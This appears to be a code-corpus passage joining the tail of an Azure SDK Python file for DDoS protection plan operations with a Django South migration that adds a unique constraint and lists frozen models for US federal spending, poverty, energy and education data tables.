pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ddosProtectionPlans'} # type: ignore
|
Azure/azure-sdk-for-python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_02_01/aio/operations/_ddos_protection_plans_operations.py
|
Python
|
mit
| 23,738
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding unique constraint on 'Cfda', fields ['program_number']
db.create_unique('data_cfda', ['program_number'])
def backwards(self, orm):
# Removing unique constraint on 'Cfda', fields ['program_number']
db.delete_unique('data_cfda', ['program_number'])
models = {
'data.agegroup': {
'Meta': {'object_name': 'AgeGroup'},
'age_group_desc': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'age_group_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.alternativefuelvehicles': {
'Meta': {'object_name': 'AlternativeFuelVehicles'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.annualstateenergyexpenditures': {
'Meta': {'object_name': 'AnnualStateEnergyExpenditures'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msn': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.ansicountystate': {
'Meta': {'object_name': 'AnsiCountyState'},
'ansi_class': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'ansi_state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'county': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'data.ansistate': {
'Meta': {'object_name': 'AnsiState'},
'ansi_state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'gnisid': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'state_name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'data.atcodes': {
'Meta': {'object_name': 'AtCodes'},
'assistance_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'code': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'data.averageteachersalary': {
'Meta': {'object_name': 'AverageTeacherSalary'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.bilingualedspending': {
'Meta': {'object_name': 'BilingualEdSpending'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.budgetcategorysubfunctions': {
'Meta': {'object_name': 'BudgetCategorySubfunctions'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'npp_budget_category': ('django.db.models.fields.TextField', [], {'max_length': '64'}),
'subfunction': ('django.db.models.fields.TextField', [], {'max_length': '3'})
},
'data.category': {
'Meta': {'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
'data.cfda': {
'Meta': {'object_name': 'Cfda'},
'accomplishments': ('django.db.models.fields.TextField', [], {}),
'account_id': ('django.db.models.fields.TextField', [], {}),
'agency_name': ('django.db.models.fields.TextField', [], {}),
'appeals': ('django.db.models.fields.TextField', [], {}),
'applicant_eligibility': ('django.db.models.fields.TextField', [], {}),
'application_procedure': ('django.db.models.fields.TextField', [], {}),
'approval_time_range': ('django.db.models.fields.TextField', [], {}),
'assistance_length_time': ('django.db.models.fields.TextField', [], {}),
'assistance_type': ('django.db.models.fields.TextField', [], {}),
'audits': ('django.db.models.fields.TextField', [], {}),
'authorization': ('django.db.models.fields.TextField', [], {}),
'award_procedure': ('django.db.models.fields.TextField', [], {}),
'beneficiary_eligibility': ('django.db.models.fields.TextField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'credentials': ('django.db.models.fields.TextField', [], {}),
'deadline': ('django.db.models.fields.TextField', [], {}),
'example_projects': ('django.db.models.fields.TextField', [], {}),
'formula_matching_grant_request': ('django.db.models.fields.TextField', [], {}),
'headquarters_office': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'objective': ('django.db.models.fields.TextField', [], {}),
'obligations': ('django.db.models.fields.TextField', [], {}),
'omb_agency_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'omb_bureau_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'popular_name': ('django.db.models.fields.TextField', [], {}),
'preapplication_coordination': ('django.db.models.fields.TextField', [], {}),
'program_number': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'}),
'program_title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'published_date': ('django.db.models.fields.DateTimeField', [], {}),
'range_average_assistance': ('django.db.models.fields.TextField', [], {}),
'record': ('django.db.models.fields.TextField', [], {}),
'recovery_flag': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'regional_local_office': ('django.db.models.fields.TextField', [], {}),
'regulations': ('django.db.models.fields.TextField', [], {}),
'renewal': ('django.db.models.fields.TextField', [], {}),
'reports': ('django.db.models.fields.TextField', [], {}),
'selection_criteria': ('django.db.models.fields.TextField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'use': ('django.db.models.fields.TextField', [], {}),
'web_address': ('django.db.models.fields.TextField', [], {})
},
'data.cffr': {
'Meta': {'unique_together': "(('year', 'state', 'county', 'cffrprogram'),)", 'object_name': 'Cffr'},
'amount': ('django.db.models.fields.BigIntegerField', [], {}),
'amount_per_capita': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'cffrprogram': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.CffrProgram']"}),
'county': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.County']"}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffragency': {
'Meta': {'object_name': 'CffrAgency'},
'agency_code': ('django.db.models.fields.CharField', [], {'max_length': '4'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '90'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffrgeo': {
'Meta': {'object_name': 'CffrGeo'},
'congress_district': ('django.db.models.fields.CharField', [], {'max_length': '34', 'null': 'True'}),
'county_code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'county_gu': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'place_code': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'place_gu': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'place_name': ('django.db.models.fields.CharField', [], {'max_length': '24'}),
'population': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'split_gu': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'state_code': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'state_gu': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'type_gu': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffrindividualcounty': {
'Meta': {'unique_together': "(('year', 'state', 'county'),)", 'object_name': 'CffrIndividualCounty'},
'amount': ('django.db.models.fields.BigIntegerField', [], {}),
'amount_per_capita': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'county': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.County']"}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffrindividualstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'CffrIndividualState'},
'amount': ('django.db.models.fields.BigIntegerField', [], {}),
'amount_per_capita': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffrobjectcode': {
'Meta': {'object_name': 'CffrObjectCode'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_code': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'data.cffrprogram': {
'Meta': {'unique_together': "(('year', 'program_code'),)", 'object_name': 'CffrProgram'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'program_code': ('django.db.models.fields.CharField', [], {'max_length': '6'}),
'program_desc': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'program_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffrprogramraw': {
'Meta': {'object_name': 'CffrProgramRaw'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'program_id_code': ('django.db.models.fields.CharField', [], {'max_length': '6'}),
'program_name': ('django.db.models.fields.CharField', [], {'max_length': '74'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffrraw': {
'Meta': {'object_name': 'CffrRaw'},
'agency_code': ('django.db.models.fields.CharField', [], {'max_length': '4'}),
'amount': ('django.db.models.fields.BigIntegerField', [], {}),
'amount_adjusted': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
'congress_district': ('django.db.models.fields.CharField', [], {'max_length': '34', 'null': 'True'}),
'county_code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'county_name': ('django.db.models.fields.CharField', [], {'max_length': '24', 'null': 'True'}),
'funding_sign': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'place_code': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'place_name': ('django.db.models.fields.CharField', [], {'max_length': '24', 'null': 'True'}),
'population': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'program_code': ('django.db.models.fields.CharField', [], {'max_length': '6'}),
'state_code': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'state_postal': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffrstate': {
'Meta': {'unique_together': "(('year', 'state', 'cffrprogram'),)", 'object_name': 'CffrState'},
'amount': ('django.db.models.fields.BigIntegerField', [], {}),
'amount_per_capita': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'cffrprogram': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.CffrProgram']"}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.childrenpovertystate': {
'Meta': {'object_name': 'ChildrenPovertyState'},
'children_poverty': ('django.db.models.fields.IntegerField', [], {}),
'children_poverty_moe': ('django.db.models.fields.IntegerField', [], {}),
'children_poverty_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'children_poverty_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'children_total': ('django.db.models.fields.IntegerField', [], {}),
'children_total_moe': ('django.db.models.fields.IntegerField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.childrenpovertystateraw': {
'Meta': {'object_name': 'ChildrenPovertyStateRaw'},
'children_poverty': ('django.db.models.fields.IntegerField', [], {}),
'children_poverty_moe': ('django.db.models.fields.IntegerField', [], {}),
'children_poverty_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'children_poverty_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'children_total': ('django.db.models.fields.IntegerField', [], {}),
'children_total_moe': ('django.db.models.fields.IntegerField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.county': {
'Meta': {'unique_together': "(('state', 'county_ansi'),)", 'object_name': 'County'},
'county_abbr': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'county_ansi': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'county_desc': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'county_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sort_order': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.diplomarecipienttotal': {
'Meta': {'object_name': 'DiplomaRecipientTotal'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.dropoutsrace': {
'Meta': {'object_name': 'DropoutsRace'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.drugfreeschoolspending': {
'Meta': {'object_name': 'DrugFreeSchoolSpending'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.educationalattainment': {
'Meta': {'object_name': 'EducationalAttainment'},
'category': ('django.db.models.fields.TextField', [], {'max_length': '64'}),
'gender': ('django.db.models.fields.TextField', [], {'max_length': '16'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.TextField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'value_type': ('django.db.models.fields.TextField', [], {'max_length': '16'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.electricemissionsstate': {
'Meta': {'unique_together': "(('year', 'state', 'producer_type', 'energy_source'),)", 'object_name': 'ElectricEmissionsState'},
'co2': ('django.db.models.fields.BigIntegerField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'energy_source': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nox': ('django.db.models.fields.BigIntegerField', [], {}),
'producer_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'so2': ('django.db.models.fields.BigIntegerField', [], {}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.electricemissionsstateraw': {
'Meta': {'object_name': 'ElectricEmissionsStateRaw'},
'co2': ('django.db.models.fields.BigIntegerField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'energy_source': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nox': ('django.db.models.fields.BigIntegerField', [], {}),
'producer_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'so2': ('django.db.models.fields.BigIntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.ellstudentsdistrict': {
'Meta': {'object_name': 'EllStudentsDistrict'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.employment': {
'Meta': {'object_name': 'Employment'},
'black_civilian_labor_force': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_unemployed': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'hispanic_civilian_labor_force': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'hispanic_unemployed': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'total_civilian_labor_force': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_civilian_labor_force': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_unemployed': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.energyconsumptionstate': {
'Meta': {'unique_together': "(('year', 'state', 'msn'),)", 'object_name': 'EnergyConsumptionState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msn': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.Msn']"}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.energyconsumptionstateraw': {
'Meta': {'object_name': 'EnergyConsumptionStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msn': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.energyproductionstate': {
'Meta': {'unique_together': "(('year', 'state', 'msn'),)", 'object_name': 'EnergyProductionState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msn': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.Msn']"}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.energyproductionstateraw': {
'Meta': {'object_name': 'EnergyProductionStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msn': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.enrolledstudentsdistrict': {
'Meta': {'object_name': 'EnrolledStudentsDistrict'},
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.CharField', [], {'max_length': '9'})
},
'data.enrollmentrace': {
'Meta': {'object_name': 'EnrollmentRace'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.ethnicity': {
'Meta': {'object_name': 'Ethnicity'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'ethnicity_abbr': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '5'}),
'ethnicity_desc': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'ethnicity_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.expenditureperpupil': {
'Meta': {'object_name': 'ExpenditurePerPupil'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.familiespovertystate': {
'Meta': {'object_name': 'FamiliesPovertyState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'families_poverty_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'families_poverty_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'families_total': ('django.db.models.fields.IntegerField', [], {}),
'families_total_moe': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.familiespovertystateraw': {
'Meta': {'object_name': 'FamiliesPovertyStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'families_poverty_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'families_poverty_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'families_total': ('django.db.models.fields.IntegerField', [], {}),
'families_total_moe': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.fcnaspending': {
'Meta': {'object_name': 'FcnaSpending'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.federalimpactaid': {
'Meta': {'object_name': 'FederalImpactAid'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.federaltaxcollectionstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'FederalTaxCollectionState'},
'business_income': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'estate': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'estate_trust_income': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'excise': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'gift': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'individual_total': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'notwitheld_income_and_seca': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'railroad_retirement': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
